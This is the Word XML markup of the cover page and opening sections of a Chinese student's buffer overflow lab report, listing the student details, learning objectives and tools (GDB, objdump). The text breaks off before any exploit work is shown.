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宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4716145" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="20" name="图片 20"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江泽民题词"/>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716145" cy="1143000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="64"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="64"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1254125" cy="1227455"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="19" name="图片 1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264308" cy="1237041"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="2168" w:firstLineChars="600"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>题目：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">缓冲区溢出攻击实验 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="2783" w:firstLineChars="990"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>班    级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2020211305</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p>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学    号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2020211346</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p>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姓    名：</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倪玮昊</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="2783" w:firstLineChars="990"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>学    院：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>计算机学院</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="2125" w:firstLineChars="756"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="2502" w:firstLineChars="890"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">年 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 月 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>一、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1. C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>语言程序的机器级表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>掌握</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>调试器的用法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3. C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编译器生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>x86-64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>机器代码，理解不同控制结构生成的基本指令模式，过程的实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>掌握两种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>缓冲区攻击方法，进一步理解软件漏洞的危害。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shell7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Objdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>命令反汇编</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GDB调试工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>积分榜（http://10.120.11.13:193</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0/scoreboard）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>三、实验内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>登录bupt1服务器，在home目录下可以找到一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
